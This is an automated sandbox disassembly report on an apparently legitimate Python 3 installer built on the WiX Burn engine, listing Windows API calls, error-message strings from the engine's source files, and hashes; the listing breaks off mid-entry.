                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$ErrorLast$CloseCreateHandlePointerRead
                                                                                                                                  • String ID: 8NH$Failed to copy engine from: %ls to: %ls$Failed to create engine file at path: %ls$Failed to seek to beginning of engine file: %ls$Failed to seek to checksum in exe header.$Failed to seek to original data in exe burn section header.$Failed to seek to signature table in exe header.$Failed to update signature offset.$Failed to zero out original data offset.$c:\agent\_work\138\s\src\burn\engine\cache.cpp$cabinet.dll$msi.dll
                                                                                                                                  • API String ID: 3456208997-3337570208
                                                                                                                                  • Opcode ID: e431df117a846772eceba88566853087df0272682285f27ad8c1ec920c323a63
                                                                                                                                  • Instruction ID: 305d7b741ffa282acbcaee52cd1eaf9188ced4268e8387cdb6b83b6f2888bf6e
                                                                                                                                  • Opcode Fuzzy Hash: e431df117a846772eceba88566853087df0272682285f27ad8c1ec920c323a63
                                                                                                                                  • Instruction Fuzzy Hash: D851E876A41621BBDB11ABA99C0AF7F6968AF05B10F11017FFD00BB281EA1C9C0056FD
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,8000FFFF,feclient.dll,?,00494C68,004CB4D8,?,feclient.dll,00000000,?,?), ref: 0049476C
                                                                                                                                  • ReadFile.KERNEL32(feclient.dll,feclient.dll,00000004,?,00000000,?,00494C68,004CB4D8,?,feclient.dll,00000000,?,?), ref: 0049478D
                                                                                                                                  • GetLastError.KERNEL32(?,00494C68,004CB4D8,?,feclient.dll,00000000,?,?), ref: 00494793
                                                                                                                                  • ReadFile.KERNEL32(feclient.dll,00000000,004CB508,?,00000000,00000000,004CB509,?,00494C68,004CB4D8,?,feclient.dll,00000000,?,?), ref: 00494821
                                                                                                                                  • GetLastError.KERNEL32(?,00494C68,004CB4D8,?,feclient.dll,00000000,?,?), ref: 00494827
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastRead$CurrentProcess
                                                                                                                                  • String ID: Failed to allocate buffer for verification secret.$Failed to inform parent process that child is running.$Failed to read size of verification secret from parent pipe.$Failed to read verification process id from parent pipe.$Failed to read verification secret from parent pipe.$Verification process id from parent does not match.$Verification secret from parent does not match.$Verification secret from parent is too big.$c:\agent\_work\138\s\src\burn\engine\pipe.cpp$feclient.dll$msasn1.dll
                                                                                                                                  • API String ID: 1233551569-1453137465
                                                                                                                                  • Opcode ID: f5debee70bba80e62ecd2420162c39154e0d562f8453cf247a324de92074541b
                                                                                                                                  • Instruction ID: 8b6321e5d8e918e9960b8f2634246581697b77a97d2abdddb9cf72ec42f0efa6
                                                                                                                                  • Opcode Fuzzy Hash: f5debee70bba80e62ecd2420162c39154e0d562f8453cf247a324de92074541b
                                                                                                                                  • Instruction Fuzzy Hash: FA51B676D40325B7DB11AAE58C46F6F7A68AB81B11F210177FE10BB280D6789D0187ED
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: StringVariant$AllocClearFreeInit
                                                                                                                                  • String ID: DetectCondition$Failed to get @DetectCondition.$Failed to get @InstallArguments.$Failed to get @Protocol.$Failed to get @RepairArguments.$Failed to get @Repairable.$Failed to get @UninstallArguments.$Failed to parse command lines.$Failed to parse exit codes.$InstallArguments$Invalid protocol type: %ls$Protocol$RepairArguments$Repairable$UninstallArguments$burn$netfx4$none
                                                                                                                                  • API String ID: 760788290-1911311241
                                                                                                                                  • Opcode ID: 9b8090d60c37f4f37f57ee4800f6d291281489ba84cbc330f7ee6e430777491b
                                                                                                                                  • Instruction ID: 5b271e5acc065e37fc7b753af639eb91a91ee988fa2753cd983a2ee28a86a0bf
                                                                                                                                  • Opcode Fuzzy Hash: 9b8090d60c37f4f37f57ee4800f6d291281489ba84cbc330f7ee6e430777491b
                                                                                                                                  • Instruction Fuzzy Hash: 63413B76A44721F6D711A5688D42FAB6218DB22B34F31432FF810B63D2C7EC9E00A6DD
                                                                                                                                  APIs
                                                                                                                                  • GetStringTypeW.KERNEL32(00000001,56004CDC,00000001,?,004899FC,?,00000000,00000000,?,?,004899E4,?,?,00000000,?), ref: 0048906E
                                                                                                                                  Strings
                                                                                                                                  • Failed to parse condition "%ls". Invalid version format, at position %d., xrefs: 00489300
                                                                                                                                  • Failed to parse condition "%ls". Unexpected '~' operator at position %d., xrefs: 004894C6
                                                                                                                                  • Failed to parse condition "%ls". Unterminated literal at position %d., xrefs: 00489156
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\condition.cpp, xrefs: 00489142, 0048920C, 00489288, 004892EC, 0048942A, 0048946E, 004894B2
                                                                                                                                  • NOT, xrefs: 00489399
                                                                                                                                  • Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d., xrefs: 00489482
                                                                                                                                  • -, xrefs: 004891D6
                                                                                                                                  • AND, xrefs: 0048937A
                                                                                                                                  • Failed to parse condition "%ls". Version can have a maximum of 4 parts, at position %d., xrefs: 0048929C
                                                                                                                                  • Failed to parse condition "%ls". Unexpected character at position %d., xrefs: 00489220
                                                                                                                                  • Failed to parse condition "%ls". Constant too big, at position %d., xrefs: 0048943E
                                                                                                                                  • Failed to set symbol value., xrefs: 0048911E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: StringType
                                                                                                                                  • String ID: -$AND$Failed to parse condition "%ls". Constant too big, at position %d.$Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d.$Failed to parse condition "%ls". Invalid version format, at position %d.$Failed to parse condition "%ls". Unexpected '~' operator at position %d.$Failed to parse condition "%ls". Unexpected character at position %d.$Failed to parse condition "%ls". Unterminated literal at position %d.$Failed to parse condition "%ls". Version can have a maximum of 4 parts, at position %d.$Failed to set symbol value.$NOT$c:\agent\_work\138\s\src\burn\engine\condition.cpp
                                                                                                                                  • API String ID: 4177115715-1912921257
                                                                                                                                  • Opcode ID: 4ca9b95d40cb001f156d2623d0517e7464291ef0c6980c245bcc87ae33c574be
                                                                                                                                  • Instruction ID: 46b7ecacc1fa8dfe28a6279aa9cf6f45a5fd0013763c5416de5a65ffd5ca9883
                                                                                                                                  • Opcode Fuzzy Hash: 4ca9b95d40cb001f156d2623d0517e7464291ef0c6980c245bcc87ae33c574be
                                                                                                                                  • Instruction Fuzzy Hash: 8FF10572600A01FBDB15AF55C889BBE7BA4FB04704F184D4BF9059A281C3BDDE91DB89
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00483A1A: GetProcessHeap.KERNEL32(?,000001C7,?,004823A7,?,00000001,80004005,8007139F,?,?,004C0687,8007139F,?,00000000,00000000,8007139F), ref: 00483A2B
                                                                                                                                    • Part of subcall function 00483A1A: RtlAllocateHeap.NTDLL(00000000,?,004823A7,?,00000001,80004005,8007139F,?,?,004C0687,8007139F,?,00000000,00000000,8007139F), ref: 00483A32
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,success,000000FF,?,Type,00000000,?,?,00000000,?,00000001,?), ref: 004A1B6C
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,error,000000FF), ref: 004A1B8A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CompareHeapString$AllocateProcess
                                                                                                                                  • String ID: Code$ExitCode$Failed to allocate memory for exit code structs.$Failed to get @Code.$Failed to get @Type.$Failed to get exit code node count.$Failed to get next node.$Failed to parse @Code value: %ls$Failed to select exit code nodes.$Invalid exit code type: %ls$Type$c:\agent\_work\138\s\src\burn\engine\exeengine.cpp$error$forceReboot$scheduleReboot$success
                                                                                                                                  • API String ID: 2664528157-823451179
                                                                                                                                  • Opcode ID: 7a8bd4d31de0c6be18659cc470dacc1e859876488833d64eefd1a770d01a4d67
                                                                                                                                  • Instruction ID: e07f1008038c0f951f27165f179e5f6d4956bcc389b3eae0b9a7a79d1eeb6799
                                                                                                                                  • Opcode Fuzzy Hash: 7a8bd4d31de0c6be18659cc470dacc1e859876488833d64eefd1a770d01a4d67
                                                                                                                                  • Instruction Fuzzy Hash: B661E274A44216EBCB109B51CC55FAEBBA4EF22730F20425BF415AB3A0DB789A01D798
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0048D552: EnterCriticalSection.KERNEL32(000000D0,?,000000B8,00000000,?,00497027,000000B8,00000000,?,00000000,75A4B390), ref: 0048D561
                                                                                                                                    • Part of subcall function 0048D552: LeaveCriticalSection.KERNEL32(000000D0,?,00497027,000000B8,00000000,?,00000000,75A4B390), ref: 0048D584
                                                                                                                                  • ReleaseMutex.KERNEL32(00000000,?,00000000,crypt32.dll,00000000,00000001,00000000), ref: 00496F76
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00496F7F
                                                                                                                                  • CloseHandle.KERNEL32(?,?,00000000,crypt32.dll,00000000,00000001,00000000), ref: 00496F9F
                                                                                                                                    • Part of subcall function 004ABB0B: SetThreadExecutionState.KERNEL32(80000001), ref: 004ABB10
                                                                                                                                  Strings
                                                                                                                                  • Engine cannot start apply because it is busy with another action., xrefs: 00496C13
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\core.cpp, xrefs: 00496C7A, 00496E4B
                                                                                                                                  • Failed to create cache thread., xrefs: 00496E55
                                                                                                                                  • Failed while caching, aborting execution., xrefs: 00496E7D
                                                                                                                                  • Another per-machine setup is already executing., xrefs: 00496DB8
                                                                                                                                  • Failed to register bundle., xrefs: 00496DDB
                                                                                                                                  • crypt32.dll, xrefs: 00496CB6
                                                                                                                                  • Failed to cache engine to working directory., xrefs: 00496D58
                                                                                                                                  • comres.dll, xrefs: 00496FC5
                                                                                                                                  • Failed to set initial apply variables., xrefs: 00496CEE
                                                                                                                                  • UX aborted apply begin., xrefs: 00496C84
                                                                                                                                  • Another per-user setup is already executing., xrefs: 00496CC4
                                                                                                                                  • Failed to elevate., xrefs: 00496D7E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCriticalHandleSection$EnterExecutionLeaveMutexReleaseStateThread
                                                                                                                                  • String ID: Another per-machine setup is already executing.$Another per-user setup is already executing.$Engine cannot start apply because it is busy with another action.$Failed to cache engine to working directory.$Failed to create cache thread.$Failed to elevate.$Failed to register bundle.$Failed to set initial apply variables.$Failed while caching, aborting execution.$UX aborted apply begin.$c:\agent\_work\138\s\src\burn\engine\core.cpp$comres.dll$crypt32.dll
                                                                                                                                  • API String ID: 303827279-252372456
                                                                                                                                  • Opcode ID: 21d031cfcd5a33ba816c172f1ebe66422deace3100ae0d4829f66dd0fca7dfc9
                                                                                                                                  • Instruction ID: fa29b07b73ad1ed2c5ef93096b5479110c053177a76bb0f2e95c80fdb871b56c
                                                                                                                                  • Opcode Fuzzy Hash: 21d031cfcd5a33ba816c172f1ebe66422deace3100ae0d4829f66dd0fca7dfc9
                                                                                                                                  • Instruction Fuzzy Hash: FCC19DB1901215EBDF159F64C885FEE3AA8EF04304F16417FFD09AA246DB389944CBA9
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,?), ref: 004982FC
                                                                                                                                    • Part of subcall function 004C0C8F: OpenProcessToken.ADVAPI32(?,00000008,?,5TH,00000000,?,?,?,?,?,?,?,00497696,00000000), ref: 004C0CAD
                                                                                                                                    • Part of subcall function 004C0C8F: GetLastError.KERNEL32(?,?,?,?,?,?,?,00497696,00000000), ref: 004C0CB7
                                                                                                                                    • Part of subcall function 004C0C8F: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,00497696,00000000), ref: 004C0D41
                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000), ref: 00498322
                                                                                                                                  • GetLastError.KERNEL32 ref: 0049832C
                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?,00000000), ref: 004983A9
                                                                                                                                  • GetLastError.KERNEL32 ref: 004983B3
                                                                                                                                  • UuidCreate.RPCRT4(?), ref: 004983F2
                                                                                                                                  Strings
                                                                                                                                  • Temp\, xrefs: 00498381
                                                                                                                                  • %ls%ls\, xrefs: 00498444
                                                                                                                                  • Failed to append bundle id on to temp path for working folder., xrefs: 0049845C
                                                                                                                                  • version.dll, xrefs: 0049846B
                                                                                                                                  • Failed to create working folder guid., xrefs: 004983FF
                                                                                                                                  • Failed to ensure windows path for working folder ended in backslash., xrefs: 00498377
                                                                                                                                  • Failed to get windows path for working folder., xrefs: 0049835A
                                                                                                                                  • Failed to convert working folder guid into string., xrefs: 00498432
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\cache.cpp, xrefs: 00498350, 004983D7, 00498428
                                                                                                                                  • Failed to concat Temp directory on windows path for working folder., xrefs: 00498399
                                                                                                                                  • Failed to copy working folder path., xrefs: 00498477
                                                                                                                                  • Failed to get temp path for working folder., xrefs: 004983E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$Process$CloseCreateCurrentDirectoryHandleOpenPathTempTokenUuidWindows
                                                                                                                                  • String ID: %ls%ls\$Failed to append bundle id on to temp path for working folder.$Failed to concat Temp directory on windows path for working folder.$Failed to convert working folder guid into string.$Failed to copy working folder path.$Failed to create working folder guid.$Failed to ensure windows path for working folder ended in backslash.$Failed to get temp path for working folder.$Failed to get windows path for working folder.$Temp\$c:\agent\_work\138\s\src\burn\engine\cache.cpp$version.dll
                                                                                                                                  • API String ID: 266130487-3147601122
                                                                                                                                  • Opcode ID: e4f934d46cce9ec56eb34abc8f113c4e3fe03a0c6d2735ec647a264dc64ad7b3
                                                                                                                                  • Instruction ID: a0a408db40898e2bec64270856cdfaeba92d40560eb1c2ed5e70e1db373b3fa0
                                                                                                                                  • Opcode Fuzzy Hash: e4f934d46cce9ec56eb34abc8f113c4e3fe03a0c6d2735ec647a264dc64ad7b3
                                                                                                                                  • Instruction Fuzzy Hash: 62410872E44325A7CB20A6A99C4AF9F7AA89F01B11F11417BBD44FB240FA7C9D0047ED
                                                                                                                                  APIs
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,000002C0,00000410), ref: 004C8541
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF), ref: 004C855C
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,upgrade,000000FF), ref: 004C85FF
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,00700079,000000FF,version,000000FF,000002D8,004CB508,00000000), ref: 004C863E
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exclusive,000000FF), ref: 004C8691
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,004CB508,000000FF,true,000000FF), ref: 004C86AF
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 004C86E7
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,enclosure,000000FF), ref: 004C882B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CompareString
                                                                                                                                  • String ID: application$c:\agent\_work\138\s\src\libs\dutil\apuputil.cpp$enclosure$exclusive$http://appsyndication.org/2006/appsyn$true$type$upgrade$version
                                                                                                                                  • API String ID: 1825529933-2703766385
                                                                                                                                  • Opcode ID: 7166de38d06a76234bde6fb4ca685016f00e30b4792e0a013c597bc0eee8e03a
                                                                                                                                  • Instruction ID: 133c0a1f50edf9d21ebc1d8151d22a9e9a32dd2bde550580b69f12ac3b05ee14
                                                                                                                                  • Opcode Fuzzy Hash: 7166de38d06a76234bde6fb4ca685016f00e30b4792e0a013c597bc0eee8e03a
                                                                                                                                  • Instruction Fuzzy Hash: 9CB1CF39904306ABCB909F55CC81F5A7BB5BB44734F244A6EF925DB2D1DB78E800CB58
                                                                                                                                  APIs
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,rel,000000FF,?,?,?,00000000), ref: 004C7C41
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,href,000000FF), ref: 004C7C66
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,length,000000FF), ref: 004C7C86
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 004C7CB9
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,type,000000FF), ref: 004C7CD5
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 004C7D00
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 004C7D77
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 004C7DC3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$Compare$Free
                                                                                                                                  • String ID: comres.dll$feclient.dll$href$length$msasn1.dll$msi.dll$rel$title$type$version.dll
                                                                                                                                  • API String ID: 318886736-3944986760
                                                                                                                                  • Opcode ID: e5203ea9bc30864172f2bc3b66a77441817de0095a2769c93f990dacaffd9203
                                                                                                                                  • Instruction ID: f33f63522d7149627080cc5476e7c4a25ea3789879369fe87891f893092c0898
                                                                                                                                  • Opcode Fuzzy Hash: e5203ea9bc30864172f2bc3b66a77441817de0095a2769c93f990dacaffd9203
                                                                                                                                  • Instruction Fuzzy Hash: 3261353990411AFBCB55DB94CC45FBEBB78AF04721F20426AE512B72A0D7349E40DF94
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0049E223: LoadBitmapW.USER32(?,00000001), ref: 0049E259
                                                                                                                                    • Part of subcall function 0049E223: GetLastError.KERNEL32 ref: 0049E265
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 0049E39B
                                                                                                                                  • RegisterClassW.USER32(?), ref: 0049E3AF
                                                                                                                                  • GetLastError.KERNEL32 ref: 0049E3BA
                                                                                                                                  • UnregisterClassW.USER32(WixBurnSplashScreen,?), ref: 0049E4BF
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 0049E4CE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClassErrorLastLoad$BitmapCursorDeleteObjectRegisterUnregister
                                                                                                                                  • String ID: Failed to create window.$Failed to load splash screen.$Failed to register window.$Unexpected return value from message pump.$WixBurnSplashScreen$c:\agent\_work\138\s\src\burn\engine\splashscreen.cpp
                                                                                                                                  • API String ID: 164797020-989680284
                                                                                                                                  • Opcode ID: ea26935c19e833f41a792e65a80cae50842febfcc922f366db826410bd786e29
                                                                                                                                  • Instruction ID: bedb6037ba1b1c2c46911c7d536b2f5a0ebe7beaa51eca4bc1b9c3ea6ee7817f
                                                                                                                                  • Opcode Fuzzy Hash: ea26935c19e833f41a792e65a80cae50842febfcc922f366db826410bd786e29
                                                                                                                                  • Instruction Fuzzy Hash: DF418076900219BFEF119BE5DD4AEAEBB78FF04710F104137FA04A6260DB389D10879A
                                                                                                                                  APIs
                                                                                                                                  • WaitForMultipleObjects.KERNEL32(00000001,004ABA8B,00000000,000000FF,00000001,00000000,00000000,004ABA8B,00000001,?), ref: 004A9C87
                                                                                                                                  • GetLastError.KERNEL32 ref: 004A9DF7
                                                                                                                                  • GetExitCodeThread.KERNEL32(?,00000001), ref: 004A9E37
                                                                                                                                  • GetLastError.KERNEL32 ref: 004A9E41
                                                                                                                                  Strings
                                                                                                                                  • Failed to execute package provider registration action., xrefs: 004A9D58
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\apply.cpp, xrefs: 004A9E1E, 004A9E68
                                                                                                                                  • Failed to execute MSI package., xrefs: 004A9CE7
                                                                                                                                  • Failed to execute EXE package., xrefs: 004A9CBE
                                                                                                                                  • Failed to get cache thread exit code., xrefs: 004A9E72
                                                                                                                                  • Failed to execute compatible package action., xrefs: 004A9DB4
                                                                                                                                  • Failed to execute MSP package., xrefs: 004A9D0C
                                                                                                                                  • Failed to execute dependency action., xrefs: 004A9D77
                                                                                                                                  • Failed to execute MSU package., xrefs: 004A9D3C
                                                                                                                                  • Failed to wait for cache check-point., xrefs: 004A9E28
                                                                                                                                  • Failed to load compatible package on per-machine package., xrefs: 004A9D9D
                                                                                                                                  • Cache thread exited unexpectedly., xrefs: 004A9E88
                                                                                                                                  • Invalid execute action., xrefs: 004A9E97
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$CodeExitMultipleObjectsThreadWait
                                                                                                                                  • String ID: Cache thread exited unexpectedly.$Failed to execute EXE package.$Failed to execute MSI package.$Failed to execute MSP package.$Failed to execute MSU package.$Failed to execute compatible package action.$Failed to execute dependency action.$Failed to execute package provider registration action.$Failed to get cache thread exit code.$Failed to load compatible package on per-machine package.$Failed to wait for cache check-point.$Invalid execute action.$c:\agent\_work\138\s\src\burn\engine\apply.cpp
                                                                                                                                  • API String ID: 3703294532-3690680958
                                                                                                                                  • Opcode ID: 5dcb9159210cdfe16bf9dc026fc23a48b285ebe088926d4f8daa3caaf980dfa5
                                                                                                                                  • Instruction ID: 9703d8f4e476190ea1a04ae2842a9c9bb0addef76445dbe3e8c56dc3bdc105d8
                                                                                                                                  • Opcode Fuzzy Hash: 5dcb9159210cdfe16bf9dc026fc23a48b285ebe088926d4f8daa3caaf980dfa5
                                                                                                                                  • Instruction Fuzzy Hash: 82716E71A00625EBDB10DF658941EAF7BB8EB26710F20456BF905E7380D7389E019BA9
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004C3F62: GetVersionExW.KERNEL32(?,?,?,00000000), ref: 004C3FB1
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,004D0FB8,00020006,00000000,?,00000000,00000000,00000000,?,00000000,00000001,00000000,00000000), ref: 0048F4D7
                                                                                                                                    • Part of subcall function 004C194C: RegSetValueExW.ADVAPI32(?,00000005,00000000,00000004,?,00000004,00000001,?,0048F324,004D0FB8,Resume,00000005,?,00000000,00000000,00000000), ref: 004C1961
